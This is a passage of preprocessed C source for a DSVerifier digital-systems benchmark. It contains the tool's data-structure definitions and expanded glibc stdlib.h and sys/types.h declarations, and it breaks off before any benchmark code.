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the_stack_data/22877.c | # 1 "benchmarks/ds-07-impl2.c"
# 1 "<built-in>"
# 1 "<command-line>"
# 1 "/usr/include/stdc-predef.h" 1 3 4
# 1 "<command-line>" 2
# 1 "benchmarks/ds-07-impl2.c"
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 1
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h"
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h" 1
# 132 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h"
int X_SIZE_VALUE = 0;
int overflow_mode = 1;
int rounding_mode = 0;
# 155 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h"
typedef struct {
double a[100];
int a_size;
double b[100];
int b_size;
double sample_time;
double a_uncertainty[100];
double b_uncertainty[100];
} digital_system;
typedef struct {
double A[4][4];
double B[4][4];
double C[4][4];
double D[4][4];
double states[4][4];
double outputs[4][4];
double inputs[4][4];
double K[4][4];
unsigned int nStates;
unsigned int nInputs;
unsigned int nOutputs;
} digital_system_state_space;
typedef struct {
int int_bits;
int frac_bits;
double max;
double min;
int default_realization;
double delta;
int scale;
double max_error;
} implementation;
typedef struct {
int push;
int in;
int sbiw;
int cli;
int out;
int std;
int ldd;
int subi;
int sbci;
int lsl;
int rol;
int add;
int adc;
int adiw;
int rjmp;
int mov;
int sbc;
int ld;
int rcall;
int cp;
int cpc;
int ldi;
int brge;
int pop;
int ret;
int st;
int brlt;
int cpi;
} instructions;
typedef struct {
long clock;
int device;
double cycle;
instructions assembly;
} hardware;
typedef struct{
float Ap, Ar, Ac;
float wp, wc, wr;
int type;
}filter_parameters;
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
# 1 "/usr/include/stdlib.h" 1 3 4
# 25 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 33 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 3 4
# 1 "/usr/include/features.h" 1 3 4
# 461 "/usr/include/features.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 1 3 4
# 452 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 453 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4
# 454 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4
# 462 "/usr/include/features.h" 2 3 4
# 485 "/usr/include/features.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h" 1 3 4
# 11 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 2 3 4
# 486 "/usr/include/features.h" 2 3 4
# 34 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 2 3 4
# 26 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 209 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4
# 209 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4
typedef long unsigned int size_t;
# 321 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4
typedef int wchar_t;
# 32 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 1 3 4
# 52 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 3 4
typedef enum
{
P_ALL,
P_PID,
P_PGID
} idtype_t;
# 40 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/waitstatus.h" 1 3 4
# 41 "/usr/include/stdlib.h" 2 3 4
# 55 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 1 3 4
# 120 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4
# 25 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 2 3 4
# 121 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 2 3 4
# 56 "/usr/include/stdlib.h" 2 3 4
typedef struct
{
int quot;
int rem;
} div_t;
typedef struct
{
long int quot;
long int rem;
} ldiv_t;
__extension__ typedef struct
{
long long int quot;
long long int rem;
} lldiv_t;
# 97 "/usr/include/stdlib.h" 3 4
extern size_t __ctype_get_mb_cur_max (void) __attribute__ ((__nothrow__ , __leaf__)) ;
extern double atof (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern int atoi (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern long int atol (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
__extension__ extern long long int atoll (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern double strtod (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern float strtof (const char *__restrict __nptr,
char **__restrict __endptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long double strtold (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 176 "/usr/include/stdlib.h" 3 4
extern long int strtol (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern unsigned long int strtoul (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern long long int strtoq (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern unsigned long long int strtouq (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern long long int strtoll (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern unsigned long long int strtoull (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 385 "/usr/include/stdlib.h" 3 4
extern char *l64a (long int __n) __attribute__ ((__nothrow__ , __leaf__)) ;
extern long int a64l (const char *__s)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
# 1 "/usr/include/x86_64-linux-gnu/sys/types.h" 1 3 4
# 27 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types.h" 1 3 4
# 27 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 28 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/timesize.h" 1 3 4
# 29 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
typedef unsigned char __u_char;
typedef unsigned short int __u_short;
typedef unsigned int __u_int;
typedef unsigned long int __u_long;
typedef signed char __int8_t;
typedef unsigned char __uint8_t;
typedef signed short int __int16_t;
typedef unsigned short int __uint16_t;
typedef signed int __int32_t;
typedef unsigned int __uint32_t;
typedef signed long int __int64_t;
typedef unsigned long int __uint64_t;
typedef __int8_t __int_least8_t;
typedef __uint8_t __uint_least8_t;
typedef __int16_t __int_least16_t;
typedef __uint16_t __uint_least16_t;
typedef __int32_t __int_least32_t;
typedef __uint32_t __uint_least32_t;
typedef __int64_t __int_least64_t;
typedef __uint64_t __uint_least64_t;
typedef long int __quad_t;
typedef unsigned long int __u_quad_t;
typedef long int __intmax_t;
typedef unsigned long int __uintmax_t;
# 141 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/typesizes.h" 1 3 4
# 142 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/time64.h" 1 3 4
# 143 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
typedef unsigned long int __dev_t;
typedef unsigned int __uid_t;
typedef unsigned int __gid_t;
typedef unsigned long int __ino_t;
typedef unsigned long int __ino64_t;
typedef unsigned int __mode_t;
typedef unsigned long int __nlink_t;
typedef long int __off_t;
typedef long int __off64_t;
typedef int __pid_t;
typedef struct { int __val[2]; } __fsid_t;
typedef long int __clock_t;
typedef unsigned long int __rlim_t;
typedef unsigned long int __rlim64_t;
typedef unsigned int __id_t;
typedef long int __time_t;
typedef unsigned int __useconds_t;
typedef long int __suseconds_t;
typedef int __daddr_t;
typedef int __key_t;
typedef int __clockid_t;
typedef void * __timer_t;
typedef long int __blksize_t;
typedef long int __blkcnt_t;
typedef long int __blkcnt64_t;
typedef unsigned long int __fsblkcnt_t;
typedef unsigned long int __fsblkcnt64_t;
typedef unsigned long int __fsfilcnt_t;
typedef unsigned long int __fsfilcnt64_t;
typedef long int __fsword_t;
typedef long int __ssize_t;
typedef long int __syscall_slong_t;
typedef unsigned long int __syscall_ulong_t;
typedef __off64_t __loff_t;
typedef char *__caddr_t;
typedef long int __intptr_t;
typedef unsigned int __socklen_t;
typedef int __sig_atomic_t;
# 30 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __u_char u_char;
typedef __u_short u_short;
typedef __u_int u_int;
typedef __u_long u_long;
typedef __quad_t quad_t;
typedef __u_quad_t u_quad_t;
typedef __fsid_t fsid_t;
typedef __loff_t loff_t;
typedef __ino_t ino_t;
# 59 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
typedef __dev_t dev_t;
typedef __gid_t gid_t;
typedef __mode_t mode_t;
typedef __nlink_t nlink_t;
typedef __uid_t uid_t;
typedef __off_t off_t;
# 97 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
typedef __pid_t pid_t;
typedef __id_t id_t;
typedef __ssize_t ssize_t;
typedef __daddr_t daddr_t;
typedef __caddr_t caddr_t;
typedef __key_t key_t;
# 1 "/usr/include/x86_64-linux-gnu/bits/types/clock_t.h" 1 3 4
typedef __clock_t clock_t;
# 127 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/clockid_t.h" 1 3 4
typedef __clockid_t clockid_t;
# 129 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/time_t.h" 1 3 4
typedef __time_t time_t;
# 130 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/timer_t.h" 1 3 4
typedef __timer_t timer_t;
# 131 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 144 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 145 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef unsigned long int ulong;
typedef unsigned short int ushort;
typedef unsigned int uint;
# 1 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 3 4
typedef __int8_t int8_t;
typedef __int16_t int16_t;
typedef __int32_t int32_t;
typedef __int64_t int64_t;
# 156 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __uint8_t u_int8_t;
typedef __uint16_t u_int16_t;
typedef __uint32_t u_int32_t;
typedef __uint64_t u_int64_t;
typedef int register_t __attribute__ ((__mode__ (__word__)));
# 176 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/endian.h" 1 3 4
# 24 "/usr/include/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/endian.h" 1 3 4
# 35 "/usr/include/x86_64-linux-gnu/bits/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/endianness.h" 1 3 4
# 36 "/usr/include/x86_64-linux-gnu/bits/endian.h" 2 3 4
# 25 "/usr/include/endian.h" 2 3 4
# 35 "/usr/include/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 1 3 4
# 33 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4
static __inline __uint16_t
__bswap_16 (__uint16_t __bsx)
{
return __builtin_bswap16 (__bsx);
}
static __inline __uint32_t
__bswap_32 (__uint32_t __bsx)
{
return __builtin_bswap32 (__bsx);
}
# 69 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4
__extension__ static __inline __uint64_t
__bswap_64 (__uint64_t __bsx)
{
return __builtin_bswap64 (__bsx);
}
# 36 "/usr/include/endian.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 1 3 4
# 32 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 3 4
static __inline __uint16_t
__uint16_identity (__uint16_t __x)
{
return __x;
}
static __inline __uint32_t
__uint32_identity (__uint32_t __x)
{
return __x;
}
static __inline __uint64_t
__uint64_identity (__uint64_t __x)
{
return __x;
}
# 37 "/usr/include/endian.h" 2 3 4
# 177 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/sys/select.h" 1 3 4
# 30 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/select.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/select.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/select.h" 2 3 4
# 31 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 1 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__sigset_t.h" 1 3 4
typedef struct
{
unsigned long int __val[(1024 / (8 * sizeof (unsigned long int)))];
} __sigset_t;
# 5 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 2 3 4
typedef __sigset_t sigset_t;
# 34 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timeval.h" 1 3 4
struct timeval
{
__time_t tv_sec;
__suseconds_t tv_usec;
};
# 38 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4
struct timespec
{
__time_t tv_sec;
__syscall_slong_t tv_nsec;
# 26 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4
};
# 40 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
typedef __suseconds_t suseconds_t;
typedef long int __fd_mask;
# 59 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
typedef struct
{
__fd_mask __fds_bits[1024 / (8 * (int) sizeof (__fd_mask))];
} fd_set;
typedef __fd_mask fd_mask;
# 91 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 101 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
extern int select (int __nfds, fd_set *__restrict __readfds,
fd_set *__restrict __writefds,
fd_set *__restrict __exceptfds,
struct timeval *__restrict __timeout);
# 113 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
extern int pselect (int __nfds, fd_set *__restrict __readfds,
fd_set *__restrict __writefds,
fd_set *__restrict __exceptfds,
const struct timespec *__restrict __timeout,
const __sigset_t *__restrict __sigmask);
# 126 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 180 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __blksize_t blksize_t;
typedef __blkcnt_t blkcnt_t;
typedef __fsblkcnt_t fsblkcnt_t;
typedef __fsfilcnt_t fsfilcnt_t;
# 227 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 1 3 4
# 44 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 1 3 4
# 21 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 2 3 4
# 45 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
typedef struct __pthread_internal_list
{
struct __pthread_internal_list *__prev;
struct __pthread_internal_list *__next;
} __pthread_list_t;
typedef struct __pthread_internal_slist
{
struct __pthread_internal_slist *__next;
} __pthread_slist_t;
# 74 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4
struct __pthread_mutex_s
{
int __lock;
unsigned int __count;
int __owner;
unsigned int __nusers;
int __kind;
short __spins;
short __elision;
__pthread_list_t __list;
# 53 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4
};
# 75 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
# 87 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4
struct __pthread_rwlock_arch_t
{
unsigned int __readers;
unsigned int __writers;
unsigned int __wrphase_futex;
unsigned int __writers_futex;
unsigned int __pad3;
unsigned int __pad4;
int __cur_writer;
int __shared;
signed char __rwelision;
unsigned char __pad1[7];
unsigned long int __pad2;
unsigned int __flags;
# 55 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4
};
# 88 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
struct __pthread_cond_s
{
__extension__ union
{
__extension__ unsigned long long int __wseq;
struct
{
unsigned int __low;
unsigned int __high;
} __wseq32;
};
__extension__ union
{
__extension__ unsigned long long int __g1_start;
struct
{
unsigned int __low;
unsigned int __high;
} __g1_start32;
};
unsigned int __g_refs[2] ;
unsigned int __g_size[2];
unsigned int __g1_orig_size;
unsigned int __wrefs;
unsigned int __g_signals[2];
};
# 24 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 2 3 4
typedef unsigned long int pthread_t;
typedef union
{
char __size[4];
int __align;
} pthread_mutexattr_t;
typedef union
{
char __size[4];
int __align;
} pthread_condattr_t;
typedef unsigned int pthread_key_t;
typedef int pthread_once_t;
union pthread_attr_t
{
char __size[56];
long int __align;
};
typedef union pthread_attr_t pthread_attr_t;
typedef union
{
struct __pthread_mutex_s __data;
char __size[40];
long int __align;
} pthread_mutex_t;
typedef union
{
struct __pthread_cond_s __data;
char __size[48];
__extension__ long long int __align;
} pthread_cond_t;
typedef union
{
struct __pthread_rwlock_arch_t __data;
char __size[56];
long int __align;
} pthread_rwlock_t;
typedef union
{
char __size[8];
long int __align;
} pthread_rwlockattr_t;
typedef volatile int pthread_spinlock_t;
typedef union
{
char __size[32];
long int __align;
} pthread_barrier_t;
typedef union
{
char __size[4];
int __align;
} pthread_barrierattr_t;
# 228 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 395 "/usr/include/stdlib.h" 2 3 4
extern long int random (void) __attribute__ ((__nothrow__ , __leaf__));
extern void srandom (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__));
extern char *initstate (unsigned int __seed, char *__statebuf,
size_t __statelen) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern char *setstate (char *__statebuf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
struct random_data
{
int32_t *fptr;
int32_t *rptr;
int32_t *state;
int rand_type;
int rand_deg;
int rand_sep;
int32_t *end_ptr;
};
extern int random_r (struct random_data *__restrict __buf,
int32_t *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int srandom_r (unsigned int __seed, struct random_data *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int initstate_r (unsigned int __seed, char *__restrict __statebuf,
size_t __statelen,
struct random_data *__restrict __buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2, 4)));
extern int setstate_r (char *__restrict __statebuf,
struct random_data *__restrict __buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int rand (void) __attribute__ ((__nothrow__ , __leaf__));
extern void srand (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__));
extern int rand_r (unsigned int *__seed) __attribute__ ((__nothrow__ , __leaf__));
extern double drand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern double erand48 (unsigned short int __xsubi[3]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long int lrand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern long int nrand48 (unsigned short int __xsubi[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long int mrand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern long int jrand48 (unsigned short int __xsubi[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void srand48 (long int __seedval) __attribute__ ((__nothrow__ , __leaf__));
extern unsigned short int *seed48 (unsigned short int __seed16v[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void lcong48 (unsigned short int __param[7]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
struct drand48_data
{
unsigned short int __x[3];
unsigned short int __old_x[3];
unsigned short int __c;
unsigned short int __init;
__extension__ unsigned long long int __a;
};
extern int drand48_r (struct drand48_data *__restrict __buffer,
double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int erand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int lrand48_r (struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int nrand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int mrand48_r (struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int jrand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int srand48_r (long int __seedval, struct drand48_data *__buffer)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int seed48_r (unsigned short int __seed16v[3],
struct drand48_data *__buffer) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int lcong48_r (unsigned short int __param[7],
struct drand48_data *__buffer)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern void *malloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__))
__attribute__ ((__alloc_size__ (1))) ;
extern void *calloc (size_t __nmemb, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (1, 2))) ;
extern void *realloc (void *__ptr, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__)) __attribute__ ((__alloc_size__ (2)));
extern void *reallocarray (void *__ptr, size_t __nmemb, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__))
__attribute__ ((__alloc_size__ (2, 3)));
extern void free (void *__ptr) __attribute__ ((__nothrow__ , __leaf__));
# 1 "/usr/include/alloca.h" 1 3 4
# 24 "/usr/include/alloca.h" 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 25 "/usr/include/alloca.h" 2 3 4
extern void *alloca (size_t __size) __attribute__ ((__nothrow__ , __leaf__));
# 569 "/usr/include/stdlib.h" 2 3 4
extern void *valloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__))
__attribute__ ((__alloc_size__ (1))) ;
extern int posix_memalign (void **__memptr, size_t __alignment, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern void *aligned_alloc (size_t __alignment, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (2))) ;
extern void abort (void) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern int atexit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int at_quick_exit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int on_exit (void (*__func) (int __status, void *__arg), void *__arg)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void quick_exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void _Exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern char *getenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 647 "/usr/include/stdlib.h" 3 4
extern int putenv (char *__string) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int setenv (const char *__name, const char *__value, int __replace)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int unsetenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int clearenv (void) __attribute__ ((__nothrow__ , __leaf__));
# 675 "/usr/include/stdlib.h" 3 4
extern char *mktemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 688 "/usr/include/stdlib.h" 3 4
extern int mkstemp (char *__template) __attribute__ ((__nonnull__ (1))) ;
# 710 "/usr/include/stdlib.h" 3 4
extern int mkstemps (char *__template, int __suffixlen) __attribute__ ((__nonnull__ (1))) ;
# 731 "/usr/include/stdlib.h" 3 4
extern char *mkdtemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 784 "/usr/include/stdlib.h" 3 4
extern int system (const char *__command) ;
# 800 "/usr/include/stdlib.h" 3 4
extern char *realpath (const char *__restrict __name,
char *__restrict __resolved) __attribute__ ((__nothrow__ , __leaf__)) ;
typedef int (*__compar_fn_t) (const void *, const void *);
# 820 "/usr/include/stdlib.h" 3 4
extern void *bsearch (const void *__key, const void *__base,
size_t __nmemb, size_t __size, __compar_fn_t __compar)
__attribute__ ((__nonnull__ (1, 2, 5))) ;
extern void qsort (void *__base, size_t __nmemb, size_t __size,
__compar_fn_t __compar) __attribute__ ((__nonnull__ (1, 4)));
# 840 "/usr/include/stdlib.h" 3 4
extern int abs (int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
